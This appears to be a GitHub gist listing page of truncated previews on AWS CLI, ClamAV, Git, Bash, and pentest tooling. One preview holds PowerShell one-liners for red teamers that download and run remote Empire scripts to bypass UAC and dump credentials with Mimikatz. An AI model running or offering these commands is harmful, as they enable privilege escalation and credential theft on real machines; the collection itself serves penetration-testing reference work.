babywyrm

AWS CLI Cheatsheet

http://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html https://www.youtube.com/watch?v=_wiGpBQGCjU

Setup

babywyrm

Get ClamAV running on Mac OS X (using Homebrew)

The easiest way to get the ClamAV package is using Homebrew

$ brew install clamav

Before trying to start the clamd process, you'll need a copy of the ClamAV databases.

Create a freshclam.conf file and configure as so

babywyrm

#!/usr/bin/env python

import base64

from Crypto import Random
from Crypto.Cipher import AES

BS = 16
pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
unpad = lambda s : s[0:-ord(s[-1])]

babywyrm

Git

Global Settings

• Related Setup: https://gist.github.com/hofmannsven/6814278
• Related Pro Tips: https://ochronus.com/git-tips-from-the-trenches/
• Interactive Beginners Tutorial: http://try.github.io/
• Git Cheatsheet by GitHub: https://services.github.com/on-demand/downloads/github-git-cheat-sheet/

Reminder

Press minus + shift + s and return to chop/fold long lines!

babywyrm

Top 10 Examples of AWS CLI Query

List Volumes showing attachment using Dictionary Notation

$ aws ec2 describe-volumes \
  --query 'Volumes[*].{ID:VolumeId,InstanceId:Attachments[0].InstanceId,AZ:AvailabilityZone,Size:Size}'
[
    {
        "InstanceId": "i-a071c394",

babywyrm

"Knowledge is powerful, be careful how you use it!"

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.

babywyrm

# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

babywyrm

-----------------------------------------------------------------------------------------------------
#!/bin/bash
set -o errexit
set -o pipefail
set -o nounset
set -o xtrace
# set -eox pipefail #safety for script
------------------------------------------------------------------------------------------
shell script
$0 represent the shell script file name itself

babywyrm

# /dev/alias Pentest Environment Setup
# Version: 0.2 (20131211)
# Created By: Glenn 'devalias' Grant (http://devalias.net)
# License: The MIT License (MIT) - Copyright (c) 2013 Glenn 'devalias' Grant (see http://choosealicense.com/licenses/mit/ for full license text)

# TODO:
#   * Option to check if tools (from this script and external) exist/are already installed and what versions
#     * Eg nmap , metasploit, etc
#   * Lair: https://github.com/fishnetsecurity/Lair
#     * apt-get install python-pip

babywyrm

import sys

# Provides introspection into the Python Scripter API.

apis = ('extender', 'callbacks', 'helpers', 'toolFlag', 'messageIsRequest', 'messageInfo')
funcs = (type, dir)

if messageIsRequest:
    for api in apis:
        print('\n{}:\n{}'.format(api, '='*len(api)))